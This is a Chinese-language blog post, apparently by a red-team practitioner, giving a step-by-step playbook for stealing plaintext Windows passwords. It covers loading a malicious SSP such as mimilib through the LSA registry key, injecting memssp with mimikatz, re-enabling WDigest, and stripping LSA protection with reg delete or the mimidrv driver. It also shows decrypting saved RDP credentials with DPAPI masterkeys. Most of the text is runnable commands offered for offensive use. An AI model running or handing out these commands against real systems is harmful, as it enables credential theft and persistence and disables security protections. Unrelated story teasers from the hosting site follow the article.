Windows多种方式获取密码

前言:


提桶跑路一个月了,平躺是真滴舒服,心宽体胖。后面一段时间直到hw结束,我打算把主要精力都放在免杀上面,不会点C真的寸步难行,或者就只能从go下手了

0x01 SSP记录明文密码


SSP(Security Support Provider)是一个用于实现身份验证的DLL文件,主要用于Windows系统的身份认证功能,例如NTLM、Kerberos、Negotiate、Secure Channel(Schannel)、Digest、Credential(CredSSP)

当操作系统启动时SSP会被加载到lsass.exe进程中,由于lsass可通过注册表进行扩展,导致了在操作系统启动时,可以加载一个自定义的dll,来实现想要执行的操作。
当我们在域环境内对LSA进行拓展自定义DLL文件时(替换某个ssp为恶意ssp,或者将ssp文件上传,修改lsa注册表使之启动时加载),就能够获取到lsass.exe进程中的明文密码。

适用场景:

适用于win8/win2012后无法获取明文密码,或者维持域控、在域控上抓用户密码

利用过程:

在mimikatz中有32和64两个版本,安装包里分别都带有不同位数的mimilib.dll。

    1. 复制mimilib.dll放到System32路径下,注意版本对应32或64位系统
    1. 修改hklm\system\currentcontrolset\control\lsa注册表中Security Packages项的值来加载新的安全支持提供程序mimilib.dll:reg add "hklm\system\currentcontrolset\control\lsa" /v "Security Packages" /t REG_MULTI_SZ /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /f
    1. 锁屏:rundll32.exe user32.dll,LockWorkStation

当用户或域用户登录时,在c:\windows\system32生成文件kiwissp.log,记录登录用户的明文密码。

或者我们可以直接利用mimikatz向lsass注入ssp,此技术不需要将mimilib.dll放入磁盘或创建注册表项,不需要重启也可以获取账户信息:

缺点:重启后失效

privilege::debug
misc::memssp

等用户输入密码登录后,将在System32中创建一个日志文件记录明文密码:
C:\Windows\System32\mimilsa.log

Invoke-Mimikatz.ps1:

Import-Module .\Invoke-Mimikatz.ps1  //导入命令
Invoke-Mimikatz -Command "misc::memssp"  //不需要重启获取 

记录修改密码:reg add "hklm\System\CurrentControlSet\Control\Lsa" /v "Notification Packages" /t REG_MULTI_SZ /d "scecli\0rassfm\0mimilib" /f

当系统发生修改密码的事件时,将生成一个日志文件记录用户新修改的明文密码:C:\Windows\System32\kiwifilter.log

0x02 修改WDigest获取明文密码:


Wdigest是lsass的一种SSP程序,主要用在Win2003的LDAP和基于Web的身份验证。它利用HTTP和简单身份验证安全层 (SASL) 交换进行身份验证。但这个认证机制会在内存中以加密的形式保存win的明文密码。

常用的mimikatz的sekurlsa::logonpasswords命令,就是依靠Wdigest来获取明文密码。
在win2008版本和Windows Server 2012 R2之前的WDigest是默认开启的。

利用方法:通过操作对应的注册表来开启WDigest:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

打了补丁或2008之后的主机会多一个UseLogonCredential项
当该项的值为1则记录明文密码,0则为不记录明文密码

最后利用mimikatz获取明文密码:

privilege::debug
sekurlsa::logonpasswords

0x03 绕过LSA保护:


微软在 Windows 8.1、Windows Server 2012 R2添加了 LSA 保护策略,以防止不受保护的进程对lsass.exe读取内存和代码注入。

查看是否开启LSA进程保护:

reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 1 /f

当RunAsPPL键值为1就表示开启了LSA保护,此时无法通过mimikatz获取明文密码:

这里如果想要获取明文密码有两种方法:

1)对注册表的RunAsPPL键值进行删除:

reg delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /f

缺点:需要重启后才能生效

2)利用mimikatz绕过LSA保护:

运行mimikatz,获取debug权限,将mimidrv.sys驱动加载进去,使用该驱动绕过lsa保护:

privilege::debug
!+
!processprotect /process:lsass.exe /remove
misc::memssp
sekurlsa::logonpasswords

0x04 破解RDP保存的凭证:


当通过rdp服务登录远程桌面时,如果选择了保存凭证,会在本地生成一个凭证文件,我们只要破解这个凭证里面的数据即可获得明文密码。

查看历史RDP记录:

reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /s

可以看到登录主机对应的ip、凭证名和用户名信息:

Windows保存RDP凭据的位置:%userprofile%\AppData\Local\Microsoft\Credentials

dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*

以CS上线后调用mimikatz为例:

    1. 利用 mimikatz 获取 guidMasterKey(凭据的GUID):
mimikatz privilege::debug
mimikatz dpapi::cred /in:C:\Users\book4yi\AppData\Local\Microsoft\Credentials\E9BD6F76581557D2A266AF679E808EAE
    1. 查找对应的 Masterkey:
mimikatz sekurlsa::dpapi
    1. 使用Masterkey解密凭证文件获取密码明文:
mimikatz dpapi::cred /in:C:\Users\book4yi\AppData\Local\Microsoft\Credentials\E9BD6F76581557D2A266AF679E808EAE /masterkey:c1889997c4a1a83f858f4cffccfd36386e769a9857a86c961d2ebb45325b40fceb45dbb8c799bb788981f1ef9cecc58779e0c0938d99074a38931de0528f3abe

参考如下:


SSP方式获取win明文密码
内网密码提取
RDP保存的凭证破解
绕过LSA保护

©著作权归作者所有,转载或内容合作请联系作者
禁止转载,如需转载请通过简信或评论联系作者。
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 212,294评论 6 493
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 90,493评论 3 385
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 157,790评论 0 348
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 56,595评论 1 284
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 65,718评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 49,906评论 1 290
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,053评论 3 410
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 37,797评论 0 268
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,250评论 1 303
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,570评论 2 327
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,711评论 1 341
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,388评论 4 332
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,018评论 3 316
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,796评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,023评论 1 266
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 46,461评论 2 360
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 43,595评论 2 350

推荐阅读更多精彩内容